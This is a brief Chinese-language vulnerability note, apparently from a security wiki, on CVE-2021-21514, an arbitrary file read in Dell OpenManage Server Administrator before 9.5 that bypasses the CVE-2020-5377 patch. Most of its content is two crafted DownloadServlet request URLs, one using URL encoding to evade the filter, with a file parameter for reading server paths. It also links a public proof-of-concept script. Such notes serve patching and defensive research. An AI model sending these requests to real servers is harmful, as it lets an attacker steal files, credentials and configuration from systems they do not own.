Dell OpenManage Server Administrator 任意文件读取 (CVE-2021-21514)¶

此漏洞利用已知的身份验证绕过来获取OMSA的Web管理界面有效会话cookie。攻击者可以构造请求从服务器读取任意文件。CVE-2021-21514为CVE-2020-5377的补丁绕过。

影响版本：Dell OpenManage Server Administrator < 9.5

通过URL编码绕过DownloadServlet方法：

https://omsa.server/{VID}/DownloadServle%74?help=Certificate&app=oma&vid={VID}&file=C:\some\file
https://omsa.server/{VID}/DownloadServlet?help=Certificate&app=oma&vid={VID}&file=C:\some\file

％74为t编码后的URL。

使用：

CVE-2020-5377.py :

poc.py:https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2020-5377_CVE-2021-21514